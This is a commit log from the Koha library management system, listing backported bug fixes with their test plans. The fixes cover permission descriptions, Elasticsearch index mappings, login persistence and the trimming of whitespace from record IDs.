4. Go to the Administration panel permissions and open the
   sub-permissions
5. Check that the manage_additional_fields permission description
   makes sense, check grammar and spelling, try the various
   combinations

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e251212ff5f783ff7d5d9de3821510ba7928d95f)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit fd982c027ddf247e441f2db278145b54f7dc537c)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36793: Fix case of $var in Context->delete_preference
Marcel de Rooy [Mon, 6 May 2024 12:28:45 +0000 (12:28 +0000)]
Bug 36793: Fix case of $var in Context->delete_preference

This only applies to 'local' preferences.

Test plan (first without this patch):
Add a local pref. Delete it. Ask value on commandline with:
* perl -MC4::Context -e"print C4::Context->preference('YOUR_PREF')"
* Did you replace YOUR_PREF :)

Now repeat with this patch. And verify fix (no value now).

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 8ea126b1f89e24a2baf8c43f7bf837bf74741088)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6122b60194af5b6939a6bbae6bc3c7973835b309)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36793: Unit test
Marcel de Rooy [Mon, 6 May 2024 12:28:45 +0000 (12:28 +0000)]
Bug 36793: Unit test

This only applies to 'local' preferences.

Test plan:
Run sysprefs.t with/without second patch.

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit b77cb006f1b1145b0251579e4122b7ad0c1bd0c1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit d39200e0d631cf5f008cbd8d185319d847a595f7)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36619: Restore 'Columns' visibility on the patron search when placing a hold
Jonathan Druart [Wed, 17 Apr 2024 10:18:11 +0000 (12:18 +0200)]
Bug 36619: Restore 'Columns' visibility on the patron search when placing a hold

Test plan:
Go to /cgi-bin/koha/reserve/request.pl?biblionumber=117
Search for "d"
Notice that with this patch applied the "Columns" button is back and
that the "Configure" is working correctly

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 76ebbb4b9b3a39c6e7ffffe8ad1b9b2c603daf5c)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit b485b949f4207ffa7b8651858ba4850557734042)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 35961: (follow-up) Pass along the borrowernumber
Lucas Gass [Mon, 13 May 2024 22:15:02 +0000 (22:15 +0000)]
Bug 35961: (follow-up) Pass along the borrowernumber

To test:
1. APPLY PATCH
2. Turn on  OpacCatalogConcerns
3. Find a record and go to the OPAC detail page.
4. Click "Report a concern" in the right navigation menu
5. Make sure it works
6. Repeat the proces from MARC view and ISBD view pages

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e412a4387c888816cf478d811a559c5f57f7e9e2)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit dc8fb79cf4438f31cf72942caccf4a7d6c9bd665)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 35961: Add missing includes
Martin Renvoize [Mon, 13 May 2024 13:43:53 +0000 (14:43 +0100)]
Bug 35961: Add missing includes

This patch adds the missing includes for the 'Catalog concerns' modal on
opac-MARCdetail and opac-ISBDdetail views.

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit c2154173af06efaf007e0cdf444f885275d61f1b)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit e90c544841efed6cf31ec8433f2e79161a07095f)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36837: Simplify XSLT and aid translatability
Tomas Cohen Arazi [Mon, 13 May 2024 13:58:48 +0000 (10:58 -0300)]
Bug 36837: Simplify XSLT and aid translatability

This patch makes the XSLT contain HTML tags instead of building them
from scratch with static attribute values. This made it awkward for
translators as CSS classes ended up being extracted for translation
purposes. Plus, there's no need to spend CPU cycles on static content
generation.

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 48e39c1e5cea2db2c4e0951a6efcae7e611490fb)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 22ff328708b377b4599bd072a9b444bae5953fa3)

5 months agoBug 33099: Add missing MARC21 Match authority mappings so "Search all headings" searc...
Janusz Kaczmarek [Tue, 18 Apr 2023 19:42:24 +0000 (21:42 +0200)]
Bug 33099: Add missing MARC21 Match authority mappings so "Search all headings" search works

The main entry form of corporate names (110), uniform titles (130), topical
terms (150), geographical names (151), and genre/form (155) are not indexed
with 'Match' search field in Elasticsearch standard mapping.  As a result,
the respective records are not present on the result list when performing
an 'All headings' search for the authority records with the main heading form
(MARC 21).

Test plan
=========
0. Have a test installation with Elasticsearch.
1. In Authorities, make an 'All headings' search for a main entry
   form from the corporate names, uniform titles, topical terms,
   geographical names, or genre/form
   --> e.g., in ktd: UK Archiving.  You will get no results.
2. Apply the patch, reindex with:
   sudo koha-elasticsearch --rebuild -r -a kohadev
3. Repeat the test. You should see 'UK Archiving' on the result list.

Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit d4c70f7d07dcc0fe1319b6e0380abcd1b7400b95)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 5e405a29a8b5af3daf8c51f814844086d828e63a)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36378: Cannot stay logged in if AutoLocation is enabled but branch ip is not...
Kyle M Hall [Wed, 20 Mar 2024 19:32:50 +0000 (15:32 -0400)]
Bug 36378: Cannot stay logged in if AutoLocation is enabled but branch ip is not set correctly

We can get into a scenario what a user cannot stay logged in for more than a single page load.
If AutoLocation is enabled with branch IP addresses being set to a space, you will be logged out with every page load.

Test Plan:
1) Set your branch ip to a space
2) Enable AutoLocation
3) Restart all the things!
4) Log out
5) Log in
6) Browse to another page
7) You are logged out
8) Apply patch
9) Repeat 1-6
10) You are not logged out!

Signed-off-by: Andrew Fuerste Henry <andrewfh@dubcolib.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 7291a312332e4fac7ac61288f33a001d4a7b306c)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit d3dd7d20f1eae2bed24bb6833d08b4c80b4a250f)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36723: Add musical presentation to Elasticsearch index mappings
danyonsewell [Fri, 10 May 2024 02:40:45 +0000 (02:40 +0000)]
Bug 36723: Add musical presentation to Elasticsearch index mappings

Testing plan:

1. Start up KTD with Elasticsearch: ktd --es8 up
2. Apply the patch and restart everything (restart_all).
3. Reset the mappings: Administration > Catalog > Search engine configuration (Elasticsearch) > Reset mappings (at the bottom of the page)
4. Reindex: koha-elasticsearch --rebuild -d -b -a kohadev
5. Alternative to steps 3 and 4: reset_all
6. Update the visibility for 254$a in the default framework so that it is visible in the Editor (OPAC, Staff interface should already be selected).
7. Add a new record using the default framework and put a term in 254$a, such as 'Full score'.

Sponsored-by: Education Services Australia SCIS
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit fffb3665eadec04792b055e9ba04152b3b36d6dd)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 58052b46f4365b0d5c6729b80a84b7f13ebe6b34)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 34823: Do not show Item group dropdown if there are no item groups
Lucas Gass [Wed, 6 Mar 2024 18:41:04 +0000 (18:41 +0000)]
Bug 34823: Do not show Item group dropdown if there are no item groups

To test:
1. Enable EnableItemGroups and EnableItemGroupHolds
2. Go to the OPAC and log in as a patron
3. Go to any record that doesn't have grouped items and try to place a hold
4. Click on "Show more options"
5. See "Request specific item group:" and dropdown
6. APPLY PATCH
7. Try again, this time if the record has no item groups you should not see the dropdown at all.

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit be98d633be1fb34f52ccc8b57b18280856cf1d1a)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 58c25f1c78091c714e24710ca65b8989f02c80b4)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36794: Illegitimate modification of biblionumber subfield content (999 $c)
Janusz Kaczmarek [Mon, 6 May 2024 13:24:10 +0000 (13:24 +0000)]
Bug 36794: Illegitimate modification of biblionumber subfield content (999 $c)

It happens that librarians, by mistake, open a biblio editor putting in the
URL, by hand, the biblionumber prefixed with a blank (e.g.
.../addbiblio.pl?biblionumber= 123 -- mind the space before 123).
In such a case the editor opens with the right biblio record (i.e. 123)
but, after saving the record, the content of the biblionumber MARC
field (999 $c for a standard MARC 21 installation) results modified and
contains additional initial blanks.

Moreover, while using ES and making a search for the record (with title,
author etc.) we get two records on the result list (instead of one).

This is because in the addbiblio.pl script $biblionumber is taken (and
continuously used) directly from CGI parameter, without any
validation and/or correction.

Test plan:
==========
0. Have a test installation with ES.
1. Open a biblio record in the editor with an added space before
   biblionumber value, e.g.:
   http://ktd:8081/cgi-bin/koha/cataloguing/addbiblio.pl?biblionumber= 123
   Save the record.
2. From the Normal view choose Save -> MARCXML.  Open the saved file in
   your favourite editor.  You should see, at the end, something like:
   <datafield tag="999" ind1=" " ind2=" ">
     <subfield code="c"> 123</subfield>
   (mind the space before 123).
   This is not right.
3. Make a search with the title or author's name from the record (e.g.
   Henning Mankell for the record 123 from the default ktd data set).
   You should get two records instead of one (while using ES).
4. Apply the patch, restart_all.  Repeat p. 1 and 2 with a different
   biblionumber.  Notice the unchanged (i.e. without spaces) value
   of 999 $c subfield in the exported record and only one record
   as a result of a search.

WNC amended patch - rebased, added conditional in case no bib, moved comments to their own lines

Sponsored-by: Ignatianum University in Cracow
Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit c74169ba27c2e12473239b15358e428bc05da9f5)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 076b82d52036a4779ff762319586dcba24e72cbf)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36799: Illegitimate modification of MARC authid field content (001)
Janusz Kaczmarek [Tue, 7 May 2024 09:13:54 +0000 (09:13 +0000)]
Bug 36799: Illegitimate modification of MARC authid field content (001)

It happens that librarians to save time open an authority editor by putting
in the URL, by hand, the authid prefixed, by mistake, with a blank (e.g.
.../authorities.pl?authid= 100 -- mind the space before 100).  In
such a case the editor opens with the right auth record (i.e. 100) but,
after saving the record, the content of the authid MARC field (001 for
a standard MARC 21 installation) results modified and contains
additional initial blanks.

Moreover, if the heading (1XX field) was modified in the authority record
during such an edit, the changes will not propagate to the linked
bibliographic records.  And won't in the future.

This is because in the authorities.pl script $authid is taken (and
continuously used) directly from CGI parameter, without any
validation and/or correction (line 540 in the current main branch).

Test plan:
==========
1. Open an auth record in the editor with an added space before
   authid value, e.g.:
   http://ktd:8081/cgi-bin/koha/authorities/detail.pl?authid= 100
   Modify the heading field -- in the ktd data set:
       150 Computerized typesetting
   Save the record.
2. a) Open the record for editing again--see the space added before
   the authid in field 001.  Close the editor (with Cancel).
   b) Try to go to the linked biblio records with Used in X records.
   Note no results, if using ES.
   c) Remove the space before authid (after an:) in the URL.
   Go to the linked biblio records.  See that the content of
   the field controlled by the modified auth record did not
   update.
3. Apply the patch; restart_all.
4. Repeat p. 1 and 2 with a different authid.  Everything should
   be OK now.

Sponsored-by: Ignatianum University in Cracow
Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 4b66fbc4ebc0fe706f9a9b9057a19ee0c1b13aa3)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 65e1816bbaa83ff88800d9dd9a3eddb208eb31a7)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 33849: Do not reset new patrons home library when error occurs
Emmi Takkinen [Thu, 4 Apr 2024 06:04:47 +0000 (09:04 +0300)]
Bug 33849: Do not reset new patrons home library when error occurs

While adding new patron, if patron is flagged as duplicate
or another error occurs and their home library differs from
library user is logged in, patrons home library resets as
logged in users library. This happens with all patrons
expect those with category type C. This patch removes checking
if patrons category type is C from code so that all category
types use previously chosen home library even if error occurs.

To test:
1. Add new patron and set their library to a different
library than the one you're logged in.
2. Cause an error (wrong age, duplicate etc) while saving.
3. Attempt to save.
=> Note that patrons home library is set as one you're
logged in.
4. Apply this patch.
5. Repeat steps 1 to 3.
=> Note that patrons home library hasn't changed.

Sponsored-by: Koha-Suomi Oy
Signed-off-by: Esther <esther@bywatersolutions.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit d2f41df188c3d8e8d8705c6a5ceb583e3e29e629)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 3c52b89167018f79456a3308cdd5f7266856ef5f)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 35927: Selecting MARC framework again doesn't work when adding to basket from...
Fridolin Somers [Mon, 29 Jan 2024 09:08:00 +0000 (10:08 +0100)]
Bug 35927: Selecting MARC framework again doesn't work when adding to basket from an external source

Like Bug 19372, selecting MARC framework currently doesn't work when adding to basket from an external source.
Strangly I can reproduce on koha-testing-docker, but we have this issue with a Ubuntu Focal install.
Looks like it comes from a bad syntaxe than needs to be replaced in any case.

Test plan:
1) Add an order to a basket from an external source
2) Select another framework than the default one on the search result
   view. Before doing 'add order' on choosen search result line.
3) Chek the framework code you will pick will be used in the created biblio record

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit b7a5cc5beeb4af7cd23a414519c038f007f5b959)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 71b9421451dce017c12b82f34240431d4069a288)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36335: Fix ILS-DI GetRecords bad encoding for UNIMARC
Fridolin Somers [Fri, 15 Mar 2024 15:02:11 +0000 (16:02 +0100)]
Bug 36335: Fix ILS-DI GetRecords bad encoding for UNIMARC

ILS-DI GetRecords generates bad encoding of MARCXML for UNIMARC, like OAI in Bug 34467

Enable ILS-DI and display a record with :
<opac url>/cgi-bin/koha/ilsdi.pl?service=GetRecords&id=<biblionumber>

Well-known issue, fixed
Signed-off-by: Frédéric Demians <f.demians@tamil.fr>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 5406aaedfa86aa97ed06019f4862bff285a4aad2)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6568275bc9abec733ca6c914992b705da7bc3934)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 34041: (follow-up) escape double dashes to prevent issues
Tomas Cohen Arazi [Fri, 10 May 2024 12:30:53 +0000 (09:30 -0300)]
Bug 34041: (follow-up) escape double dashes to prevent issues

Having double dashes inside a commmented block is not valid XML. This
patch restores it, with an added message explaining it

To test:
1. Run:
   $ xmllint etc/z3950/config.xml
=> FAIL: You get:
etc/z3950/config.xml:5: parser error : Double hyphen within comment: <!--
  <config>
      <z3950_responder_options>
      <z3950_responder_options>--add-item-status k -t 5</z3950_responder_options
2. Apply this patch
3. Repeat 1
=> SUCCESS: All good!

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 11c69496bcd216ad264acd87409e5160c73995bf)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit afb9cd8e1ccf941ae8cf6e1070dd41a285dcb86b)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>